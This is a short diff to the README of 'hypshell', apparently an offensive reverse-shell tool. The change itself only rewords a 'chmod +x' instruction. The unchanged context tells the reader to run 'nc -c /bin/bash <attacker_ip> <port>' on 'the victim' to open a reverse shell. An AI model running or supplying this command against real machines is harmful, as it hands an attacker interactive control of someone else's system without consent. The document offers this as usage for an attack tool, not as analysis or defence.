Hyper100/hypshell/README.md

 Run this payload on the victim to start a reverse shell:
 `nc -c /bin/bash <attacker_ip> <port>`

-To make the script executable you can run: `chmod +x hypshell.py`
+To make the script executable run: `chmod +x hypshell.py`

 **NOTE: To exit the program you have to enter "exit" in the shell session even if you can't read the input**
 ## Options